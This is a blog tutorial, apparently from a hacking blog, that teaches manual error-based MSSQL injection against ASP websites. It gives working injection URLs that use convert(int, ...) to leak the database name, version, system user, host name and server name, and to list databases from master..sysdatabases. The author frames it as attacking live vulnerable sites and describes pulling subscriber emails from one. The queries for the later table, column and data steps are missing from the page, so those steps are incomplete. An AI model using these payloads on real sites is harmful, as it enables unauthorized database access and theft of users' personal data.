Home / asp / convert / hacking / mssql / mssql injection / Manual MSSQL Injection with error | [Microsoft OLE DB Provider for ODBC Drivers error '80040e07'] | Attack with convert

Manual MSSQL Injection with error | [Microsoft OLE DB Provider for ODBC Drivers error '80040e07'] | Attack with convert

, , , ,
Hi readers! today i will be demonstrating how to exploit websites vulnerable to mssql injection with error vulnerability. Many people don't try their hand manually on asp websites as they just open havij.exe & do the lame thing!. So hope all those who use havij.exe learn something new in this post :) . Let's get started!



Things Required
  •  Vulnerable Website


Step By Step Guide

  •  So let's assume we have found a vulnerable website xyz.com!. 
   http://www.xyz.com/vuln.asp?code=11'








  • Now our first job will be as same as we did in the previous mssql injection tutorial  which is to confirm that the error is valid! because every error doesn't means its vulnerable to sql injection.
http://www.xyz.com/vuln.asp?code=266 and 1=1#  -> This URL will load normally without any errors as 1 is always equal to 1 (simple mathematics).

  http://www.xyz.com/vuln.asp?code=266 and 1=2#  -> This URL will not Load normally as 1 is not   equal to 2.

So now by observing the behavior we can say that yes! the URL is a correct injection point. Let's now proceed with our next step.




  • Now we will be extracting out the basic information of the target website like db name, system user, host name, version,  db server, current db etc.



DB Name -   http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,db_name())  - Randomname



Version - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,@@version) - Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation
Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

System User - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,system_user) - Randomuser

Host Name - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,host_name())  - Randomhost

Server Name - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,@@servername)  - randomserver


  • Once have done with extracting the basic information about our target, then our next step will be to find out the Number of Database (Database Count).

 DB Count -  http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select top 1 cast(count([name]) as nvarchar(4000)) from [master]..[sysdatabases] )%2bchar(33))    -  10

-  Here i'm using char(33) - "!" which is just to prevent the syntax. So don't include "!" sign with the output.
-  nvarchar is a data type that stores character data in a variable-lenth field. we have used nvarchar(4000) because nvarchar(max) size limited to 4000 characters.



  • Extracting database names - In the previous step we found out that our database count is 10. So now in this step we will finding out all the 10 databases name!. 


 DB Name - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=1))

When we execute the above query, then we get our first database name!. Note carefully at the end of the query "dbid=1". To extract the other database names we will be replacing "1" by 2,3,4,5,6,7,8,9 7 so on.

Example -

 http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=2))

http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=3))




  • Table Count -  Now as all database names are known to us. Its time to hunt down for tables & columns!. Firstly we will be finding the Number of Tables (Table Count) in the current db. 

so the number of tables in the current db are 73. 


  •  Extracting Table names - 
By executing the above query you will get your first table name. In my case the first table name was - contnetarticles. Now to find the 2nd & other tables just keep on replacing "1" (Highlighted by green in the above query)  by 2,3,4,5,6,7...73! until you have extracted all the table names!.
Here in my case there was no admin or any user column (UnLuCkY) so for demonstration i'll be extracting the subscribers column!.



  • Aaah! i know some people will finding it difficult by seeing this bunch of lines & queries. If you feel like that, then believe me! just close this website & watch Pogo. Anyways let's get back to the tutorial. Now we are left with just two steps! that is finding the column name & then finally extracting the data from the columns. 
 Extracting Columns - 




In the above query we have converted our table name to ASCII value. As in my case it was -
subscribers - ASCII Value - 115 117 98 115 99 114 105 98 101 114 115.
 Now by executing the above query, we will get our first column name. To get all the column names!
just keep on replacing "1" (Highlighted by green in the above query)  by 2,3,4,5,6,7...21! until you have extracted all the column names!. The columns i got are -badMails, email, title, surname & many other.




  • Finally we are on our last step, which is to extract data from the respecting columns. I will be extracting the email column which i got in our previous step.So here goes our final query to extract the email.
 Extracting Data -  
So i hope you all enjoyed & learned something new!. If there's any mistake in this tutorial then please notify me via comment! 

Any Doubts? - Comment!

Manual MSSQL Injection with error | [Microsoft OLE DB Provider for ODBC Drivers error '80040e07'] | Attack with convert Manual MSSQL Injection with error | [Microsoft OLE DB Provider for ODBC Drivers error '80040e07'] | Attack with convert Reviewed by Rishal Dwivedi on 20:01 Rating: 5

You May Also Like

No comments:

Subscribe to: Post Comments ( Atom )
Powered by Blogger.